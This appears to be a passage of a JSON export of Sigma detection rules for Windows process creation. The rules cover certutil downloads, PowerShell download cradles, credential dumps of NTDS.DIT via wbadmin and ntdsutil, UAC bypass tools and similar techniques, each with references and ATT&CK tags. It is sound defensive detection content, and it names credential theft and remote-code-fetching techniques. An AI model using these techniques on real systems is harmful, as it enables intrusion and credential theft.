"creation_date": "2023-02-15", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_certutil_download.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/egre55/status/1087685529016193025", "https://lolbas-project.github.io/lolbas/Binaries/Certutil/", "https://forensicitguy.github.io/agenttesla-vba-certutil-download/", "https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/", "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certutil_download.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "19b08b1c-861d-4e75-a1ef-ea0c1baf202b", "value": "Suspicious Download Via Certutil.EXE" }, { "description": "Detects when an attacker tries to modify an already existing scheduled task to run from a suspicious location\nAttackers can create a simple looking task in order to avoid detection on creation, as it's often the most focused on\nInstead they modify the task after creation to include their malicious payload\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-28", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_schtasks_change.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "Internal Research", "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_change.yml" ], "tags": [ "attack.execution", "attack.t1053.005" ] }, "related": [ { 
"dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1c0e41cd-21bb-4433-9acc-4a2cd6367b9b", "value": "Suspicious Modification Of Scheduled Tasks" }, { "description": "Detects the dump of highly sensitive files such as \"NTDS.DIT\" and \"SECURITY\" hive.\nAttackers can leverage the \"wbadmin\" utility in order to dump sensitive files that might contain credential or sensitive information.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "creation_date": "2024-05-10", "falsepositive": [ "Legitimate backup operation by authorized administrators. Matches must be investigated and allowed on a case by case basis." ], "filename": "proc_creation_win_wbadmin_dump_sensitive_files.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-start-backup", "https://lolbas-project.github.io/lolbas/Binaries/Wbadmin/", "https://github.com/LOLBAS-Project/LOLBAS/blob/2cc01b01132b5c304027a658c698ae09dd6a92bf/yml/OSBinaries/Wbadmin.yml", "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-start-recovery", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wbadmin_dump_sensitive_files.yml" ], "tags": [ "attack.credential-access", "attack.t1003.003" ] }, "related": [ { "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8b93a509-1cb8-42e1-97aa-ee24224cdc15", "value": "Sensitive File Dump Via Wbadmin.EXE" }, { "description": "Detects execution of \"odbcconf\" where the path of the DLL being registered is located in a potentially suspicious location.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", 
"creation_date": "2023-05-22", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_odbcconf_exec_susp_locations.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.trendmicro.com/en_us/research/17/h/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses.html", "https://securityintelligence.com/posts/raspberry-robin-worm-dridex-malware/", "https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_odbcconf_exec_susp_locations.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.008" ] }, "related": [ { "dest-uuid": "6e3bd510-6b33-41a4-af80-2d80f3ee0071", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6b65c28e-11f3-46cb-902a-68f2cafaf474", "value": "Odbcconf.EXE Suspicious DLL Location" }, { "description": "Detects the use of Replace.exe, which can be used to replace a file with another file", "meta": { "author": "frack113", "creation_date": "2022-03-06", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_lolbin_replace.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Replace/", "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/replace", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_replace.yml" ], "tags": [ "attack.command-and-control", "attack.t1105" ] }, "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9292293b-8496-4715-9db6-37028dcda4b3", "value": "Replace.exe Usage" }, { "description": "Detects the Internet Information Services (IIS) command-line tool, 
AppCmd, being used to list passwords", "meta": { "author": "Tim Rauch, Janantha Marasinghe, Elastic (original idea)", "creation_date": "2022-11-08", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_iis_appcmd_service_account_password_dumped.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.netspi.com/blog/technical/network-penetration-testing/decrypting-iis-passwords-to-break-out-of-the-dmz-part-2/", "https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA", "https://www.elastic.co/guide/en/security/current/microsoft-iis-service-account-password-dumped.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iis_appcmd_service_account_password_dumped.yml" ], "tags": [ "attack.credential-access", "attack.t1003" ] }, "related": [ { "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2d3cdeec-c0db-45b4-aa86-082f7eb75701", "value": "Microsoft IIS Service Account Password Dumped" }, { "description": "Detects a suspicious copy operation that tries to copy a program from system (System32, SysWOW64, WinSxS) directories to another on disk.\nOften used to move LOLBINs such as 'certutil' or 'desktopimgdownldr' to a different location with a different name in order to bypass detections based on locations.\n", "meta": { "author": "Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2020-07-03", "falsepositive": [ "Depend on scripts and administrative tools used in the monitored environment (For example an admin scripts like https://www.itexperience.net/sccm-batch-files-and-32-bits-processes-on-64-bits-os/)", "When cmd.exe and xcopy.exe are called directly", "When the command contains the keywords but not in the correct order" ], "filename": 
"proc_creation_win_susp_copy_system_dir.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/", "https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html", "https://www.hybrid-analysis.com/sample/8da5b75b6380a41eee3a399c43dfe0d99eeefaa1fd21027a07b1ecaa4cd96fdd?environmentId=120", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_copy_system_dir.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036.003" ] }, "related": [ { "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fff9d2b7-e11c-4a69-93d3-40ef66189767", "value": "Suspicious Copy From or To System Directory" }, { "description": "Detects suspicious msiexec process starts with web addresses as parameter", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2018-02-09", "falsepositive": [ "False positives depend on scripts and administrative tools used in the monitored environment" ], "filename": "proc_creation_win_msiexec_web_install.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://blog.trendmicro.com/trendlabs-security-intelligence/attack-using-windows-installer-msiexec-exe-leads-lokibot/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_web_install.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.007", "attack.command-and-control", "attack.t1105" ] }, "related": [ { "dest-uuid": "365be77f-fc0e-42ee-bac8-4faf806d9336", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": 
"e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f7b5f842-a6af-4da5-9e95-e32478f3cd2f", "value": "MsiExec Web Install" }, { "description": "Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2019-02-06", "falsepositive": [ "Execution of tools named GUP.exe and located in folders different than Notepad++\\updater" ], "filename": "proc_creation_win_gup_suspicious_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_gup_suspicious_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0a4f6091-223b-41f6-8743-f322ec84930b", "value": "Suspicious GUP Usage" }, { "description": "Detects a whoami.exe executed with the /priv command line flag instructing the tool to show all current user privileges. 
This is often used after a privilege escalation attempt.", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-05-05", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_whoami_priv_discovery.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/whoami", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_whoami_priv_discovery.yml" ], "tags": [ "attack.privilege-escalation", "attack.discovery", "attack.t1033" ] }, "related": [ { "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "97a80ec7-0e2f-4d05-9ef4-65760e634f6b", "value": "Security Privileges Enumeration Via Whoami.EXE" }, { "description": "Detects possible search for JWT tokens via CLI by looking for the string \"eyJ0eX\" or \"eyJhbG\".\nThis string is used as an anchor to look for the start of the JWT token used by microsoft office and similar apps.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-10-25", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_jwt_token_search.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://mrd0x.com/stealing-tokens-from-office-applications/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_jwt_token_search.yml" ], "tags": [ "attack.credential-access", "attack.t1528" ] }, "related": [ { "dest-uuid": "890c9858-598c-401d-a4d5-c67ebcdd703a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6d3a3952-6530-44a3-8554-cf17c116c615", "value": "Potentially Suspicious JWT Token Search Via CLI" }, { "description": "Detects 
execution of ntdsutil.exe to perform different actions such as restoring snapshots...etc.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-09-14", "falsepositive": [ "Legitimate usage to restore snapshots", "Legitimate admin activity" ], "filename": "proc_creation_win_ntdsutil_susp_usage.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731620(v=ws.11)", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntdsutil_susp_usage.yml" ], "tags": [ "attack.credential-access", "attack.t1003.003" ] }, "related": [ { "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a58353df-af43-4753-bad0-cd83ef35eef5", "value": "Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe)" }, { "description": "Detects weak passwords or often abused passwords (seen used by threat actors) via the CLI.\nAn example would be a threat actor creating a new user via the net command and providing the password inline\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-09-14", "falsepositive": [ "Legitimate usage of the passwords by users via commandline (should be discouraged)", "Other currently unknown false positives" ], "filename": "proc_creation_win_susp_weak_or_abused_passwords.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", "https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708", 
"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments", "https://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_weak_or_abused_passwords.yml" ], "tags": [ "attack.defense-evasion", "attack.execution" ] }, "uuid": "91edcfb1-2529-4ac2-9ecc-7617f895c7e4", "value": "Weak or Abused Passwords In CLI" }, { "description": "Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive)", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-02-28", "falsepositive": [ "Software installers that pull packages from remote systems and execute them" ], "filename": "proc_creation_win_powershell_susp_download_patterns.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html", "https://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_susp_download_patterns.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e6c54d94-498c-4562-a37c-b469d8e9a275", "value": "Suspicious PowerShell Download and Execute Pattern" }, { "description": "Detects file association changes using the builtin \"assoc\" command.\nWhen a file is opened, the default program used to open the file (also called the file association or handler) is checked. 
File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.\n", "meta": { "author": "Timur Zinniatullin, oscd.community", "creation_date": "2019-10-21", "falsepositive": [ "Admin activity" ], "filename": "proc_creation_win_cmd_assoc_execution.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.001/T1546.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_assoc_execution.yml" ], "tags": [ "attack.persistence", "attack.t1546.001" ] }, "related": [ { "dest-uuid": "98034fef-d9fb-4667-8dc4-2eab6231724c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3d3aa6cd-6272-44d6-8afc-7e88dfef7061", "value": "Change Default File Association Via Assoc" }, { "description": "Detects the execution of Rundll32.exe with DLL files masquerading as image files", "meta": { "author": "Hieu Tran", "creation_date": "2023-03-13", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_rundll32_susp_execution_with_image_extension.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_susp_execution_with_image_extension.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.011" ] }, "related": [ { "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4aa6040b-3f28-44e3-a769-9208e5feb5ec", "value": "Suspicious Rundll32 Execution With Image Extension" }, { "description": "Detects usage of \"query.exe\" a system binary to exfil information such as \"sessions\" and \"processes\" for later use", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-01", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_query_session_exfil.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/MichalKoczwara/status/1553634816016498688", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_query_session_exfil.yml" ], "tags": [ "attack.execution" ] }, "uuid": "53ef0cef-fa24-4f25-a34a-6c72dfa2e6e2", "value": "Query Usage To Exfil Data" }, { "description": "Detects PowerShell download and execution cradles.", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-03-24", "falsepositive": [ "Some PowerShell installers were seen using similar combinations. 
Apply filters accordingly" ], "filename": "proc_creation_win_powershell_download_iex.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://labs.withsecure.com/publications/fin7-target-veeam-servers", "https://github.com/VirtualAlllocEx/Payload-Download-Cradles/blob/88e8eca34464a547c90d9140d70e9866dcbc6a12/Download-Cradles.cmd", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_download_iex.yml" ], "tags": [ "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "85b0b087-eddf-4a2b-b033-d771fa2b9775", "value": "PowerShell Download and Execution Cradles" }, { "description": "Detects command lines that contain the 'accepteula' flag which could be a sign of execution of one of the Sysinternals tools", "meta": { "author": "Markus Neis", "creation_date": "2017-08-28", "falsepositive": [ "Legitimate use of SysInternals tools", "Programs that use the same command line flag" ], "filename": "proc_creation_win_sysinternals_eula_accepted.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/Moti_B/status/1008587936735035392", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_eula_accepted.yml" ], "tags": [ "attack.resource-development", "attack.t1588.002" ] }, "related": [ { "dest-uuid": "a2fdce72-04b2-409a-ac10-cc1695f4fce0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7cccd811-7ae9-4ebe-9afd-cb5c406b824b", "value": "Potential Execution of Sysinternals Tools" }, { "description": "Detects suspicious children spawned via the Windows Terminal application which could be a sign of persistence via 
WindowsTerminal (see references section)", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-25", "falsepositive": [ "Other legitimate \"Windows Terminal\" profiles" ], "filename": "proc_creation_win_windows_terminal_susp_children.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/nas_bench/status/1550836225652686848", "https://persistence-info.github.io/Data/windowsterminalprofile.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_windows_terminal_susp_children.yml" ], "tags": [ "attack.execution", "attack.persistence" ] }, "uuid": "8de89e52-f6e1-4b5b-afd1-41ecfa300d48", "value": "Suspicious WindowsTerminal Child Processes" }, { "description": "Detects the use of the PowerShell \"Set-Service\" cmdlet to change the startup type of a service to \"disabled\" or \"manual\"", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-03-04", "falsepositive": [ "False positives may occur with troubleshooting scripts" ], "filename": "proc_creation_win_powershell_set_service_disabled.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_set_service_disabled.yml" ], "tags": [ "attack.execution", "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "62b20d44-1546-4e61-afce-8e175eb9473c", "value": "Service StartupType Change Via PowerShell Set-Service" }, { "description": "Detects potential commandline obfuscation using unicode 
characters.\nAdversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.\n", "meta": { "author": "frack113, Florian Roth (Nextron Systems), Josh Nickels", "creation_date": "2024-09-02", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_cli_obfuscation_unicode_img.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md#atomic-test-6---dlp-evasion-via-sensitive-data-in-vba-macro-over-http", "https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cli_obfuscation_unicode_img.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "584bca0f-3608-4402-80fd-4075ff6072e3", "value": "Potential CommandLine Obfuscation Using Unicode Characters From Suspicious Image" }, { "description": "Detects suspicious ways to download files from Microsoft domains that are used to store attachments in Emails or OneNote documents", "meta": { "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2021-12-27", "falsepositive": [ "Scripts or tools that download attachments from these domains (OneNote, Outlook 365)" ], "filename": "proc_creation_win_susp_download_office_domain.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/mrd0x/status/1475085452784844803?s=12", "https://twitter.com/an0n_r0/status/1474698356635193346?s=12", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_download_office_domain.yml" ], "tags": [ "attack.command-and-control", "attack.t1105", "attack.t1608" ] }, "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "84771bc3-f6a0-403e-b144-01af70e5fda0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "00d49ed5-4491-4271-a8db-650a4ef6f8c1", "value": "Suspicious Download from Office Domain" }, { "description": "Detects execution of \"odbcconf\" with the \"-f\" flag in order to load a response file which might contain a malicious action.", "meta": { "author": "Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-22", "falsepositive": [ "The rule is looking for any usage of response file, which might generate false positive when this function is used legitimately. Investigate the contents of the \".rsp\" file to determine if it is malicious and apply additional filters if necessary." 
], "filename": "proc_creation_win_odbcconf_response_file.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/", "https://www.cybereason.com/blog/threat-analysis-report-bumblebee-loader-the-high-road-to-enterprise-domain-control", "https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/", "https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_odbcconf_response_file.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.008" ] }, "related": [ { "dest-uuid": "6e3bd510-6b33-41a4-af80-2d80f3ee0071", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5f03babb-12db-4eec-8c82-7b4cb5580868", "value": "Response File Execution Via Odbcconf.EXE" }, { "description": "Detects usage of wmic to start or stop a service", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-06-20", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_wmic_service_manipulation.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_service_manipulation.yml" ], "tags": [ "attack.execution", "attack.t1047" ] }, "related": [ { "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0b7163dc-7eee-4960-af17-c0cd517f92da", "value": "Service Started/Stopped Via Wmic.EXE" }, { "description": "Detects PowerShell commands that decrypt an \".LNK\" file to drop the next stage of the malware.", "meta": { 
"author": "X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-06-30", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_powershell_decrypt_pattern.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://research.checkpoint.com/2023/chinese-threat-actors-targeting-europe-in-smugx-campaign/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_decrypt_pattern.yml" ], "tags": [ "attack.execution" ] }, "uuid": "434c08ba-8406-4d15-8b24-782cb071a691", "value": "PowerShell Execution With Potential Decryption Capabilities" }, { "description": "Detects the use of TruffleSnout.exe an iterative AD discovery toolkit for offensive operators, situational awareness and targeted low noise enumeration.", "meta": { "author": "frack113", "creation_date": "2022-08-20", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_trufflesnout.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/dsnezhkov/TruffleSnout/blob/master/TruffleSnout/Docs/USAGE.md", "https://github.com/dsnezhkov/TruffleSnout", "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1482/T1482.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_trufflesnout.yml" ], "tags": [ "attack.discovery", "attack.t1482" ] }, "related": [ { "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "69ca006d-b9a9-47f5-80ff-ecd4d25d481a", "value": "HackTool - TruffleSnout Execution" }, { "description": "Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59)", "meta": { "author": "Christian Burkard (Nextron Systems)", "creation_date": 
"2021-08-31", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_uac_bypass_computerdefaults.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/hfiref0x/UACME", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_computerdefaults.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1548.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3c05e90d-7eba-4324-9972-5d7f711a60a8", "value": "UAC Bypass Tools Using ComputerDefaults" }, { "description": "Detects potentially suspicious child processes launched via the ScreenConnect client service.\n", "meta": { "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), @Kostastsale", "creation_date": "2022-02-25", "falsepositive": [ "If the script being executed makes use of any of the utilities mentioned in the detection, then they should be filtered out or allowed." 
